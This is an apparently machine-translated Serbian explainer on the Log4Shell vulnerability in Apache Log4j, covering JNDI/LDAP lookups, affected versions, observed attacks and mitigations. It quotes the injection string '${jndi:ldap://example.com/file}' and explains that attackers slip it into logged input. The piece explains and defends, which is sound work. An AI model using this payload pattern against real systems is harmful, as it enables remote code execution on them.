Преглед садржаја[Сакрити][Прикажи]
Крајем новембра 2021. открили смо велику претњу сајбер безбедности. Ова експлоатација би потенцијално утицала на милионе рачунарских система широм света.
Ово је водич о рањивости Лог4ј и томе како је занемарена грешка у дизајну оставила преко 90% светских компјутерских услуга отвореним за напад.
Апацхе Лог4ј је услужни програм за евиденцију отвореног кода заснован на Јави који је развио Апацхе Софтваре Фоундатион. Првобитно је написао Цеки Гулцу 2001. године, а сада је део Апацхе Логгинг Сервицес, пројекта Апацхе Софтваре Фоундатион.
Компаније широм света користе Лог4ј библиотеку да би омогућиле пријављивање на своје апликације. У ствари, Јава библиотека је толико свеприсутна да је можете пронаћи у апликацијама Амазона, Мицрософта, Гоогле-а и других.
Истакнутост библиотеке значи да би сваки потенцијални недостатак у коду могао оставити милионе рачунара отвореним за хаковање. Дана 24. новембра 2021. године, а сигурност у облаку истраживач који ради за Алибабу открио је страшну грешку.
Рањивост Лог4ј, такође позната као Лог4Схелл, постоји непримећено од 2013. Рањивост је омогућила злонамерним актерима да покрећу код на погођеним системима који користе Лог4ј. То је јавно објављено 9. децембра 2021
Индустријски стручњаци зову ману Лог4Схелл-а највећа рањивост у последње време.
У недељи након објављивања рањивости, тимови за сајбер безбедност открили су милионе напада. Неки истраживачи су чак приметили стопу од преко стотину напада у минути.
Како то функционише?
Да бисмо разумели зашто је Лог4Схелл толико опасан, морамо да разумемо за шта је способан.
Рањивост Лог4Схелл дозвољава произвољно извршавање кода, што у основи значи да нападач може да покрене било коју команду или код на циљној машини.
Како то постиже?
Прво, морамо разумети шта је ЈНДИ.
Јава интерфејс за именовање и именик (ЈНДИ) је Јава услуга која омогућава Јава програмима да открију и траже податке и ресурсе преко имена. Ове услуге директоријума су важне јер обезбеђују организован скуп записа за програмере да их лако референцирају приликом креирања апликација.
ЈНДИ може да користи различите протоколе за приступ одређеном директоријуму. Један од ових протокола је Лигхтвеигхт Дирецтори Аццесс Протоцол, или ЛДАП.
Када евидентирате стринг, Лог4ј врши замене стрингова када наиђу на изразе облика ${prefix:name}
.
На пример, Text: ${java:version}
може бити забележен као Текст: Јава верзија 1.8.0_65. Ове врсте замена су уобичајене.
Можемо имати и изразе као нпр Text: ${jndi:ldap://example.com/file}
који користи ЈНДИ систем за учитавање Јава објекта са УРЛ-а преко ЛДАП протокола.
Ово ефикасно учитава податке који долазе са тог УРЛ-а у машину. Сваки потенцијални хакер може да угости злонамерни код на јавном УРЛ-у и сачека да га машине које користе Лог4ј забележе.
Пошто садржај порука дневника садржи податке које контролише корисник, хакери могу да убаце сопствене ЈНДИ референце које упућују на ЛДАП сервере које они контролишу. Ови ЛДАП сервери могу бити пуни злонамерних Јава објеката које ЈНДИ може да изврши кроз рањивост.
Оно што ово чини горим је то што није важно да ли је апликација серверска или клијентска.
Све док постоји начин да логер прочита злонамерни код нападача, апликација је и даље отворена за експлоатације.
Ко је погођен?
Рањивост утиче на све системе и услуге који користе АПацхе Лог4ј, са верзијама од 2.0 до и укључујући 2.14.1.
Неколико стручњака за безбедност саветује да ова рањивост може утицати на бројне апликације које користе Јаву.
Грешка је први пут откривена у видео игрици Минецрафт у власништву Мицрософта. Мицрософт је позвао своје кориснике да надограде своје Јава издање Минецрафт софтвера како би спречили било какав ризик.
Џен Истерли, директорка Агенције за сајбер безбедност и безбедност инфраструктуре (ЦИСА) каже да продавци имају велика одговорност да спречи крајње кориснике да злонамерни актери искористе ову рањивост.
„Продавци такође треба да комуницирају са својим клијентима како би осигурали да крајњи корисници знају да њихов производ садржи ову рањивост и да би требало да дају приоритет ажурирањима софтвера.“
Напади су наводно већ почели. Симантец, компанија која обезбеђује софтвер за сајбер безбедност, приметила је различит број захтева за нападе.
Ево неколико примера типова напада које су истраживачи открили:
- Ботнетс
Ботнети су мрежа рачунара који су под контролом једне нападачке стране. Они помажу у извођењу ДДоС напада, крађи података и другим преварама. Истраживачи су приметили Мухстик ботнет у схелл скриптама преузетим са Лог4ј експлоатације.
- КСМРиг Минер тројанац
КСМРиг је рудар криптовалута отвореног кода који користи ЦПУ за рударење Монеро токена. Сајбер криминалци могу да инсталирају КСМРиг на уређаје људи како би могли да користе своју процесорску снагу без њиховог знања.
- Кхонсари Рансомваре
Рансомвер се односи на облик малвера који је дизајниран за шифровање датотека на рачунару. Нападачи тада могу захтевати плаћање у замену за враћање приступа шифрованим датотекама. Истраживачи су открили Кхонсари рансомваре у Лог4Схелл нападима. Они циљају Виндовс сервере и користе .НЕТ фрамеворк.
Шта се даље дешава?
Стручњаци предвиђају да ће можда требати месеци или чак године да се у потпуности поправи хаос који је проузроковала рањивост Лог4Ј.
Овај процес укључује ажурирање сваког погођеног система са закрпљеном верзијом. Чак и ако су сви ови системи закрпљени, и даље постоји претња могућих бацкдоор-а које су хакери можда већ додали прозору да су сервери отворени за напад.
Многи решења и ублажавања постоје да би се спречило да ове грешке искоришћавају апликације. Нова верзија Лог4ј 2.15.0-рц1 променила је различите поставке да би ублажила ову рањивост.
Све функције које користе ЈНДИ биће подразумевано онемогућене, а удаљено тражење је такође ограничено. Онемогућавање функције тражења на вашем Лог4ј подешавању ће помоћи у смањењу ризика од могућих експлоатација.
Изван Лог4ј-а, још увек постоји потреба за ширим планом за спречавање експлоатације отвореног кода.
Раније у мају, Бела кућа је објавила извршни налог који је имао за циљ унапређење националне сајбер безбедности. То је укључивало одредбу за софтверски опис материјала (СБОМ) који је у суштини био формални документ који је садржао листу сваке ставке потребне за израду апликације.
Ово укључује делове као што су Опен Соурце пакете, зависности и АПИ-је који се користе за развој. Иако је идеја СБОМ-а корисна за транспарентност, да ли ће заиста помоћи потрошачу?
Надоградња зависности може бити превелика гњаважа. Компаније могу једноставно да одлуче да плате било какве казне уместо да ризикују да губе додатно време тражећи алтернативне пакете. Можда ће ови СБОМ-ови бити корисни само ако их обим је даље ограничен.
Zakljucak
Проблем Лог4ј је више од само техничког проблема за организације.
Пословни лидери морају бити свесни потенцијалних ризика који могу настати када се њихови сервери, производи или услуге ослањају на код који они сами не одржавају.
Ослањање на апликације отвореног кода и апликације трећих страна увек носи одређену количину ризика. Компаније би требало да размотре израду стратегија за смањење ризика пре него што нове претње дођу на видело.
Велики део веба се ослања на софтвер отвореног кода који одржавају хиљаде волонтера широм света.
Ако желимо да задржимо веб на безбедном месту, владе и корпорације треба да улажу у финансирање напора отвореног кода и агенција за сајбер безбедност као што су ЦИСА.
Ostavite komentar